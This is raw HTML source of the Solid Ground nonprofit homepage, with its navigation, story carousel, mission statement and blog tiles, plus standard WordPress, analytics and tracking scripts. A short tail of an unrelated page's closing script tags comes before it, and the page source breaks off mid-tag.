src='https://librasys.com/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=4.10'></script> <script type='text/javascript' src='https://librasys.com/wp-content/plugins/js_composer/assets/lib/vc_accordion/vc-accordion.min.js?ver=4.10'></script> <script type='text/javascript' src='https://librasys.com/wp-content/plugins/js_composer/assets/lib/vc-tta-autoplay/vc-tta-autoplay.min.js?ver=4.10'></script> </body> </html>
0
<!doctype html> <!--[if lt IE 7 ]> <html class="ie ie6 no-js" dir="ltr" lang="en-US"> <![endif]--> <!--[if IE 7 ]> <html class="ie ie7 no-js" dir="ltr" lang="en-US"> <![endif]--> <!--[if IE 8 ]> <html class="ie ie8 no-js" dir="ltr" lang="en-US"> <![endif]--> <!--[if IE 9 ]> <html class="ie ie9 no-js" dir="ltr" lang="en-US"> <![endif]--> <!--[if gt IE 9]><!--><html class="no-js" dir="ltr" lang="en-US"><!--<![endif]--> <head profile="http://gmpg.org/xfn/11"> <meta charset="UTF-8" /> <meta name="description" content="Building community to end poverty" /> <meta name="robots" content="noodp,noydir" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Solid Ground – Building community to end poverty</title> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Solid Ground &raquo; Feed" href="https://www.solid-ground.org/feed/" /> <link rel="alternate" type="application/rss+xml" title="Solid Ground &raquo; Comments Feed" href="https://www.solid-ground.org/comments/feed/" /> <link rel="canonical" href="https://www.solid-ground.org/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/s14621.pcdn.co\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://s14621.pcdn.co/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='cff-css' href='https://s14621.pcdn.co/wp-content/plugins/custom-facebook-feed/css/cff-style.css?ver=2.9.1' type='text/css' media='all' /> <link rel='stylesheet' id='sb-font-awesome-css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='wpsimpleanchorslinks_styles-css' href='https://s14621.pcdn.co/wp-content/plugins/wp-simple-anchors-links/css/styles.css?ver=1.0.0' type='text/css' media='screen' /> <link rel='stylesheet' id='bsg_combined_css-css' href='https://s14621.pcdn.co/wp-content/themes/dist/css/style.min.css?ver=1535055576' type='text/css' media='all' /> <link rel='stylesheet' id='google_font1-css' href='//fonts.googleapis.com/css?family=Source+Sans+Pro:400,400italic,600,600italic,700&#038;subset=latin,latin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='google_font2-css' href='//fonts.googleapis.com/css?family=Bitter:400,400italic,700&#038;subset=latin,latin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://s14621.pcdn.co/wp-content/plugins/jetpack/css/jetpack.css?ver=7.3.1' type='text/css' media='all' /> <script type='text/javascript' src='https://s14621.pcdn.co/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpgmza_google_api_status = {"message":"Enqueued","code":"ENQUEUED"}; /* ]]> */ </script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-content/plugins/wp-google-maps/wpgmza_data.js?ver=5.1.1'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://s14621.pcdn.co/wp-content/themes/genesis/lib/js/html5shiv.min.js?ver=1535055576'></script> <![endif]--> <link rel='https://api.w.org/' href='https://www.solid-ground.org/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.solid-ground.org/xmlrpc.php?rsd" /> <link rel="alternate" type="application/json+oembed" href="https://www.solid-ground.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.solid-ground.org%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.solid-ground.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.solid-ground.org%2F&#038;format=xml" /> <!-- Start Fluid Video Embeds Style Tag --> <style type="text/css"> /* Fluid Video Embeds */ .fve-video-wrapper { position: relative; overflow: hidden; height: 0; background-color: transparent; padding-bottom: 56.25%; margin: 0.5em 0; } .fve-video-wrapper iframe, .fve-video-wrapper object, .fve-video-wrapper embed { position: absolute; display: block; top: 0; left: 0; width: 100%; height: 100%; } .fve-video-wrapper a.hyperlink-image { position: relative; display: none; } .fve-video-wrapper a.hyperlink-image img { position: relative; z-index: 2; width: 100%; } .fve-video-wrapper a.hyperlink-image .fve-play-button { position: absolute; left: 35%; top: 35%; right: 35%; bottom: 35%; z-index: 3; background-color: rgba(40, 40, 40, 0.75); background-size: 100% 100%; border-radius: 10px; } .fve-video-wrapper a.hyperlink-image:hover .fve-play-button { background-color: rgba(0, 0, 0, 0.85); } </style> <!-- End Fluid Video Embeds Style Tag --> <!-- Facebook Pixel Code --> <script> !function(f,b,e,v,n,t,s) {if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)}; if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0'; n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t,s)}(window, document,'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '192528404654760'); fbq('track', 'PageView'); </script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=192528404654760&ev=PageView&noscript=1" /></noscript> <!-- End Facebook Pixel Code --> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-N43G96S');</script> <!-- End Google Tag Manager --> <!-- Style for popup button --> <style> #sgpb-popup-dialog-main-div{ text-align: center } </style><script type="text/javascript"> window._se_plugin_version = '8.1.9'; </script> <!-- WP Simple Anchors Links 1.0.0 by Kilukru Media (www.kilukrumedia.com)--> <!-- /WP Simple Anchors Links --> <style type='text/css'>img#wpstats{display:none}</style><link rel="pingback" href="https://www.solid-ground.org/xmlrpc.php" /> <meta itemprop="name" content="Solid Ground" /> <meta itemprop="url" content="https://www.solid-ground.org/" /> <link rel="apple-touch-icon" sizes="144x144" href="https://s14621.pcdn.co/wp-content/themes/dist/tw-images/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="152x152" href="https://s14621.pcdn.co/wp-content/themes/dist/tw-images/apple-touch-icon-152x152.png"> <link rel="apple-touch-icon" sizes="180x180" href="https://s14621.pcdn.co/wp-content/themes/dist/tw-images/apple-touch-icon-180x180.png"> <link rel="icon" type="image/png" href="https://s14621.pcdn.co/wp-content/themes/dist/tw-images/favicon-32x32.png" sizes="32x32"> <link rel="icon" type="image/png" href="https://s14621.pcdn.co/wp-content/themes/dist/tw-images/android-chrome-192x192.png" sizes="192x192"> <link rel="icon" type="image/png" href="https://s14621.pcdn.co/wp-content/themes/dist/tw-images/favicon-96x96.png" sizes="96x96"> <link rel="icon" type="image/png" href="https://s14621.pcdn.co/wp-content/themes/dist/tw-images/favicon-16x16.png" sizes="16x16"> <link rel="manifest" href="https://s14621.pcdn.co/wp-content/themes/dist/tw-images/manifest.json"> <link rel="mask-icon" href="https://s14621.pcdn.co/wp-content/themes/dist/tw-images/safari-pinned-tab.svg" color="#5bbad5"> <meta name="msapplication-TileColor" content="#da532c"> <meta name="msapplication-TileImage" content="/mstile-144x144.png"> <meta name="theme-color" content="#ffffff"><!--[if IE]><link rel="shortcut icon" href="https://s14621.pcdn.co/wp-content/themes/dist/tw-images/favicon.ico"><![endif]--><script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-8945469-2', 'auto'); ga('send', 'pageview'); </script> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="Solid Ground" /> <meta property="og:description" content="Building community to end poverty" /> <meta property="og:url" content="https://www.solid-ground.org/" /> <meta property="og:site_name" content="Solid Ground" /> <meta property="og:image" content="https://s0.wp.com/i/blank.jpg" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:text:title" content="Home Page" /> <meta name="twitter:card" content="summary" /> <!-- End Jetpack Open Graph Tags --> </head> <body class="home page-template page-template-tw-page-templates page-template-sg-front-page page-template-tw-page-templatessg-front-page-php page page-id-25 header-full-width full-width-content" itemscope itemtype="https://schema.org/WebPage"><a class="skip-to-main-content btn btn-large btn-orange" href="#main-content-container" tabindex="1">skip to main content</a><nav class="nav-secondary navbar navbar-inverse navbar-static-top" aria-label="Secondary" itemscope itemtype="https://schema.org/SiteNavigationElement"> <div class="container"><div class="row"><div class="col-md-12"> <!-- Brand and toggle get grouped for better mobile display --> <div class="navbar-header"> <div class="mobile-donate btn btn-blue visible-xs-inline-block"><a href="https://www.solid-ground.org/donate/online-donation/">Donate</a></div> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#nav-collapse-secondary"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button></div><div class="collapse navbar-collapse" id="nav-collapse-secondary"><ul id="menu-utility-nav" class="nav navbar-nav"><li id="menu-item-30" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-30"><a title="Groundviews Blog" href="https://www.solid-ground.org/groundviews/" itemprop="url"><span class="glyphicon Groundviews Blog"></span>&nbsp;<span itemprop="name">Groundviews Blog</span></a></li> <li id="menu-item-307" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-307"><a title="Events" href="https://www.solid-ground.org/get-involved/events/" itemprop="url"><span itemprop="name">Events</span></a></li> <li id="menu-item-31" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31"><a title="Careers" href="https://www.solid-ground.org/get-involved/careers/" itemprop="url"><span itemprop="name">Careers</span></a></li> <li id="menu-item-21" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21"><a title="Contact" href="https://www.solid-ground.org/contact/" itemprop="url"><span itemprop="name">Contact</span></a></li> <li id="menu-item-20" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-20"><a title="About" href="https://www.solid-ground.org/about/" itemprop="url"><span itemprop="name">About</span></a></li> <li class="right search"><form method="get" class="search-form form-inline" action="https://www.solid-ground.org/" role="search"> <div class="form-group"> <label class="sr-only sr-only-focusable" for="bsg-search-form"> </label> <div class="input-group"> <input type="search" class="search-field form-control input-sm" id="bsg-search-form" name="s" placeholder=" "> <span class="input-group-btn"> <button type="submit" class="search-submit btn btn-default input-sm"> <span class="glyphicon glyphicon-search" aria-hidden="true"></span> <span class="sr-only">Search</span> </button> </span> </div> </div> </form></li> <li class="topnav-social"> <ul class="list-unstyled social-buttons visible-lg-block"> <li class="fb-icon"><a target="_blank" href="https://www.facebook.com/SolidGroundWA/"><span class="screen-reader-text">Solid Ground on Facebook</span></a></li> <li class="tw-icon"><a target="_blank" href="https://twitter.com/SolidGround"><span class="screen-reader-text">Solid Ground on Twitter</span></a></li> <li class="yt-icon"><a target="_blank" href="https://www.youtube.com/user/SolidGroundWA"><span class="screen-reader-text">Solid Ground on YouTube</span></a></li> <li class="li-icon"><a target="_blank" href="https://www.linkedin.com/company/solid-ground"><span class="screen-reader-text">Solid Ground on LinkedIn</span></a></li> </ul> </li></ul></div></div></div></div></nav><nav class="nav-primary navbar navbar-default custom-navbar navbar-static-top" aria-label="Main" itemscope itemtype="https://schema.org/SiteNavigationElement"> <div class="container"><div class="row"><div class="col-md-12"> <!-- Brand and toggle get grouped for better mobile display --> <div class="navbar-header"> <div class="mobile-donate btn btn-blue visible-xs-inline-block"><a href="https://www.solid-ground.org/donate/online-donation/">Donate</a></div> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#nav-collapse-primary"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button><a class="navbar-brand hidden-xs" id="logo" title="Building community to end poverty" href="https://www.solid-ground.org/">Solid Ground</a></div><div class="collapse navbar-collapse" id="nav-collapse-primary"><ul id="menu-main-navigation" class="nav navbar-nav"><li id="menu-item-23" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-23 dropdown"><a class="dropdown-toggle" title="Get Help" href="https://www.solid-ground.org/get-help/" aria-haspopup="true" itemprop="url"><span itemprop="name">Get Help</span> <span class="caret"></span></a> <ul role="menu" class=" dropdown-menu"> <li id="menu-item-79" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-79"><a title="Housing Resources" href="https://www.solid-ground.org/get-help/housing/" itemprop="url"><span itemprop="name">Housing Resources</span></a></li> <li id="menu-item-693" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-693"><a title="Food &#038; Nutrition" href="https://www.solid-ground.org/get-help/food-resources/" itemprop="url"><span itemprop="name">Food &#038; Nutrition</span></a></li> <li id="menu-item-9389" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9389"><a title="More Services" href="https://www.solid-ground.org/get-help/more-services/" itemprop="url"><span itemprop="name">More Services</span></a></li> <li id="menu-item-709" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-709"><a title="Transportation" href="https://www.solid-ground.org/get-help/transportation/" itemprop="url"><span itemprop="name">Transportation</span></a></li> </ul> </li> <li id="menu-item-27" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 dropdown"><a class="dropdown-toggle" title="Get Involved" href="https://www.solid-ground.org/get-involved/" aria-haspopup="true" itemprop="url"><span itemprop="name">Get Involved</span> <span class="caret"></span></a> <ul role="menu" class=" dropdown-menu"> <li id="menu-item-83" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-83"><a title="Ways to Give" href="https://www.solid-ground.org/donate/" itemprop="url"><span itemprop="name">Ways to Give</span></a></li> <li id="menu-item-466" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-466"><a title="Volunteer" href="https://www.solid-ground.org/get-involved/volunteer/" itemprop="url"><span itemprop="name">Volunteer</span></a></li> <li id="menu-item-11821" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11821"><a title="Farm Tours &#038; Field Trips" href="https://www.solid-ground.org/get-involved/farm-tours-field-trips/" itemprop="url"><span itemprop="name">Farm Tours &#038; Field Trips</span></a></li> <li id="menu-item-84" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-84"><a title="Events" href="https://www.solid-ground.org/get-involved/events/" itemprop="url"><span itemprop="name">Events</span></a></li> <li id="menu-item-86" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-86"><a title="Take Action" href="https://www.solid-ground.org/get-involved/take-action/" itemprop="url"><span itemprop="name">Take Action</span></a></li> <li id="menu-item-85" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-85"><a title="Careers" href="https://www.solid-ground.org/get-involved/careers/" itemprop="url"><span itemprop="name">Careers</span></a></li> <li id="menu-item-9974" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9974"><a title="Get News &#038; Updates" target="_blank" href="https://www.solid-ground.org/get-involved/get-news-updates/" itemprop="url"><span itemprop="name">Get News &#038; Updates</span></a></li> </ul> </li> <li id="menu-item-24" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-24 dropdown"><a class="dropdown-toggle" title="Our Impact" href="https://www.solid-ground.org/our-impact/" aria-haspopup="true" itemprop="url"><span itemprop="name">Our Impact</span> <span class="caret"></span></a> <ul role="menu" class=" dropdown-menu"> <li id="menu-item-95" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-95"><a title="Race &#038; Social Justice" href="https://www.solid-ground.org/our-impact/race-social-justice/" itemprop="url"><span itemprop="name">Race &#038; Social Justice</span></a></li> <li id="menu-item-93" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-93"><a title="Advocacy" href="https://www.solid-ground.org/our-impact/advocacy/" itemprop="url"><span itemprop="name">Advocacy</span></a></li> <li id="menu-item-614" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-614"><a title="Housing &#038; Homelessness" href="https://www.solid-ground.org/our-impact/housing-homelessness/" itemprop="url"><span itemprop="name">Housing &#038; Homelessness</span></a></li> <li id="menu-item-700" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-700"><a title="Hunger &#038; Nutrition" href="https://www.solid-ground.org/our-impact/hunger-nutrition/" itemprop="url"><span itemprop="name">Hunger &#038; Nutrition</span></a></li> <li id="menu-item-701" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-701"><a title="More Impacts" href="https://www.solid-ground.org/our-impact/more/" itemprop="url"><span itemprop="name">More Impacts</span></a></li> <li id="menu-item-780" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-780"><a title="Transportation" href="https://www.solid-ground.org/our-impact/transportation/" itemprop="url"><span itemprop="name">Transportation</span></a></li> </ul> </li> <li id="menu-item-10219" class="donate-button btn btn-blue hidden-xs menu-item menu-item-type-post_type menu-item-object-page menu-item-10219"><a title="Donate ››" href="https://www.solid-ground.org/donate/online-donation/" itemprop="url"><span class="glyphicon Donate ››"></span>&nbsp;<span itemprop="name">Donate ››</span></a></li> <li id="menu-item-141" class="hide-except-small menu-item menu-item-type-post_type menu-item-object-page menu-item-141"><a title="About Us" href="https://www.solid-ground.org/about/" itemprop="url"><span itemprop="name">About Us</span></a></li> <li id="menu-item-142" class="hide-except-small menu-item menu-item-type-post_type menu-item-object-page menu-item-142"><a title="Contact" href="https://www.solid-ground.org/contact/" itemprop="url"><span itemprop="name">Contact</span></a></li> <li id="menu-item-143" class="hide-except-small menu-item menu-item-type-post_type menu-item-object-page menu-item-143"><a title="Events" href="https://www.solid-ground.org/get-involved/events/" itemprop="url"><span itemprop="name">Events</span></a></li> <li id="menu-item-144" class="hide-except-small menu-item menu-item-type-post_type menu-item-object-page menu-item-144"><a title="Careers" href="https://www.solid-ground.org/get-involved/careers/" itemprop="url"><span itemprop="name">Careers</span></a></li> <li id="menu-item-145" class="hide-except-small menu-item menu-item-type-post_type menu-item-object-page menu-item-145"><a title="Groundviews Blog" href="https://www.solid-ground.org/groundviews/" itemprop="url"><span class="glyphicon Groundviews Blog"></span>&nbsp;<span itemprop="name">Groundviews Blog</span></a></li> <li class="right visible-xs-block search"><form method="get" class="search-form form-inline" action="https://www.solid-ground.org/" role="search"> <div class="form-group"> <label class="sr-only sr-only-focusable" for="bsg-search-form"> </label> <div class="input-group"> <input type="search" class="search-field form-control input-sm" id="bsg-search-form" name="s" placeholder=" "> <span class="input-group-btn"> <button type="submit" class="search-submit btn btn-default input-sm"> <span class="glyphicon glyphicon-search" aria-hidden="true"></span> <span class="sr-only">Search</span> </button> </span> </div> </div> </form></li></ul></div></div></div></div></nav><div class="site-container"><div class="container visible-xs-block"><div class="row mobile-logo"><div class="col-xs-12"><a id="logo" title="Building community to end poverty" href="https://www.solid-ground.org/"></a></div></div></div><header class="site-header container" itemscope itemtype="https://schema.org/WPHeader"><div class="title-area"></div></header> <div class="container carousel-container hidden-xs large"> <div class="row"> <div class="col-sm-12"> <div id="carousel-example-generic" class="carousel slide" data-ride="carousel"> <!-- Indicators --> <ol class="carousel-indicators"><li data-target="#carousel-example-generic" class="active"data-slide-to="0"></li><li data-target="#carousel-example-generic" data-slide-to="1"></li><li data-target="#carousel-example-generic" data-slide-to="2"></li><li data-target="#carousel-example-generic" data-slide-to="3"></li><li data-target="#carousel-example-generic" data-slide-to="4"></li> </ol> <!-- Wrapper for each slide --> <div class="carousel-inner" role="listbox"><div class="item active"><img src="https://s14621.pcdn.co/wp-content/uploads/2019/04/HomepageHero-GV-Spring2019.jpg" alt="..."><div class="container carousel-caption"> <div class="row"> <div class="text col-xs-7 col-xs-offset-1"><h3>Superheroes come in all sizes</h3><p>2019 Building Community Luncheon keynote speaker Vishavjit Singh and Sand Point Housing resident youth tap into their superpowers in "Naming vulnerabilities to find inner strengths."</p></div><div class="cta col-xs-4 col-sm-offset-1 col-md-offset-0 col-lg-offset-0"><a href="https://www.solid-ground.org/naming-vulnerabilities-to-find-inner-strengths/" class="btn btn-lg btn-orange">Read Story&nbsp;&raquo;</a> </div></div> </div></div><!-- end item --><div class="item "><img src="https://s14621.pcdn.co/wp-content/uploads/2019/05/HomepageHero-RSVPAmbassadors.jpg" alt="..."><div class="container carousel-caption"> <div class="row"> <div class="text col-xs-7 col-xs-offset-1"><h3>RSVP Ambassadors spread change</h3><p>It's Older Americans Month! Learn how our RSVP Ambassadors spread the word about the benefits of volunteering later in life.</p></div><div class="cta col-xs-4 col-sm-offset-1 col-md-offset-0 col-lg-offset-0"><a href="https://www.solid-ground.org/rsvp-ambassadors-2019/" class="btn btn-lg btn-orange">Read Story&nbsp;&raquo;</a> </div></div> </div></div><!-- end item --><div class="item "><img src="https://s14621.pcdn.co/wp-content/uploads/2019/03/CAC-HomepageCarousel.jpg" alt="..."><div class="container carousel-caption"> <div class="row"> <div class="text col-xs-7 col-xs-offset-1"><h3>Community Accountability Council (CAC)</h3><p>At Solid Ground, we believe people know best what they need and should be involved in decisions that affect their lives. Our new CAC helps us create community-driven solutions to poverty.</p></div><div class="cta col-xs-4 col-sm-offset-1 col-md-offset-0 col-lg-offset-0"><a href="https://www.solid-ground.org/community-accountability-council/" class="btn btn-lg btn-orange">Learn More&nbsp;&raquo;</a> </div></div> </div></div><!-- end item --><div class="item "><img src="https://s14621.pcdn.co/wp-content/uploads/2018/11/EOY_2018-homepage-ThickGreenBar.jpg" alt="..."><div class="container carousel-caption"> <div class="row"> <div class="text col-xs-7 col-xs-offset-1"><h3>Envisioning a clear future</h3><p>Read nonprofit professional Victor De Los Santos' powerful story of finding his way despite losing his vision.</p></div><div class="cta col-xs-4 col-sm-offset-1 col-md-offset-0 col-lg-offset-0"><a href="https://www.solid-ground.org/envisioning-a-clear-future/" class="btn btn-lg btn-orange">Read Story&nbsp;&raquo;</a> </div></div> </div></div><!-- end item --><div class="item "><img src="https://s14621.pcdn.co/wp-content/uploads/2018/06/DestinationThriving-2017CommunityReportCover.jpg" alt="..."><div class="container carousel-caption"> <div class="row"> <div class="text col-xs-7 col-xs-offset-1"><h3>2017 Community Report</h3><p>The fuel that makes Solid Ground's engine run is YOU: our donors, sponsors and supporters! Your gifts keep us on the road and help us guide the more than 76,000 the people who come to us for services.</p></div><div class="cta col-xs-4 col-sm-offset-1 col-md-offset-0 col-lg-offset-0"><a href="https://s14621.pcdn.co/wp-content/uploads/2018/06/CommunityReport2017-SolidGround.pdf" class="btn btn-lg btn-orange">Read Report&nbsp;&raquo;</a> </div></div> </div></div><!-- end item --></div> <!-- Controls --> <a class="left carousel-control" href="#carousel-example-generic" role="button" data-slide="prev"> <div class="carousel-control-container left"> <span class="glyphicon glyphicon-chevron-left large" aria-hidden="true"></span> <span class="sr-only">Previous</span> </div> </a> <a class="right carousel-control" href="#carousel-example-generic" role="button" data-slide="next"> <div class="carousel-control-container right"> <span class="glyphicon glyphicon-chevron-right large" aria-hidden="true"></span> <span class="sr-only">Next</span> </div> </a> </div> <!--end carousel slide--> </div><!-- end 12 columns --> </div><!--end row--> </div> <!--end container--> <div class="container mobile-hero carousel-container visible-xs-block"> <div class="row"> <div class="col-sm-12"> <div class="carousel-inner" role="listbox"><div class="item active"><img src="https://s14621.pcdn.co/wp-content/uploads/2019/04/HomepageHero-GV-Spring2019.jpg" alt="..."><div class="container carousel-caption"><div class="row"><div class="text col-sm-7 col-xs-12"><h3>Superheroes come in all sizes</h3><p>2019 Building Community Luncheon keynote speaker Vishavjit Singh and Sand Point Housing resident youth tap into their superpowers in "Naming vulnerabilities to find inner strengths."</p></div><div class="cta col-sm-5 col-xs-12"><a class="btn btn-lg btn-white" href="https://www.solid-ground.org/naming-vulnerabilities-to-find-inner-strengths/">Read Story</a></div></div></div></div> </div> </div><!-- end columns --> </div><!--end row--> </div> <!--end container--><div class="site-inner container-fluid"><div class="content-sidebar-wrap row"> <div class="container" id="main-buttons"> <div class="row"> <a href="https://www.solid-ground.org/get-help/"> <div class="col-md-6"> <div class="main-button" id="get-help-btn"> <h3>Get Help</h3> <p>Solid Ground connects people with resources to help gain stability and build stronger futures. &raquo;</p> </div> </div> </a> <a href="https://www.solid-ground.org/get-involved/"> <div class="col-md-6" > <div class="main-button" id="get-involved-btn"> <h3>Get Involved</h3> <p>Volunteer, donate, advocate or just spread the word. Learn about the many ways you can join us to build community to end poverty. &raquo;</p> </div> </div> </a> </div> </div><hr> <div class="container" id="our-impact"> <div class="row voffset-lrg"><main class="content col-sm-12" id="main-content-container" tabindex="-1"><article class="post-25 page type-page status-publish entry" itemscope itemtype="https://schema.org/CreativeWork"><div class="entry-content clearfix" itemprop="text"><h3 class="tmc-xl tmc-large"><strong><span style="color: #a3a60f;">Solid Ground believes poverty is solvable. </span></strong></h3> <h5 class="tmc-small">Our approach combines direct services with community-based advocacy. We support individuals and work to undo racism and other oppressions that create barriers – so everyone can achieve their full potential.</h5> </div></article></main> <div class="row voffset-lrg"> <div class="col-md-12"> <a alt="Our Impact" href="https://www.solid-ground.org/our-impact/"><img src="https://s14621.pcdn.co/wp-content/uploads/2015/08/our-impact-graphic.png"/></a> </div> </div></div> </div> <div class="blue-wrap dotted-borders voffset-lrg"> <div class="container blog-excerpts"> <div class="row voffset-lrg"> <h2 class="center-dotted">Groundviews Blog</h2><div class="sg_get_homepage_blog_tiles"><div class="col-md-4 col-sm-6 col-xs-12"> <div class="panel panel-default green-bottom-border"> <div class="panel-body"><div class="featured-image"> <a href="https://www.solid-ground.org/closing-the-access-gap-to-healthcare-services/" rel="bookmark"> <div class="img-container"><img src="https://s14621.pcdn.co/wp-content/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://s14621.pcdn.co/wp-content/uploads/2019/05/accident-action-adult-1332188-361x255.jpg" width="361" height="255" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Young person with sprained wrist gives a thumbs up." srcset="https://s14621.pcdn.co/wp-content/uploads/2019/05/accident-action-adult-1332188-361x255.jpg 361w, https://s14621.pcdn.co/wp-content/uploads/2019/05/accident-action-adult-1332188-300x212.jpg 300w, https://s14621.pcdn.co/wp-content/uploads/2019/05/accident-action-adult-1332188-768x543.jpg 768w, https://s14621.pcdn.co/wp-content/uploads/2019/05/accident-action-adult-1332188.jpg 801w" sizes="(max-width: 361px) 100vw, 361px" data-attachment-id="30537" data-permalink="https://www.solid-ground.org/closing-the-access-gap-to-healthcare-services/accident-action-adult-1332188/" data-orig-file="https://s14621.pcdn.co/wp-content/uploads/2019/05/accident-action-adult-1332188.jpg" data-orig-size="801,566" data-comments-opened="1" 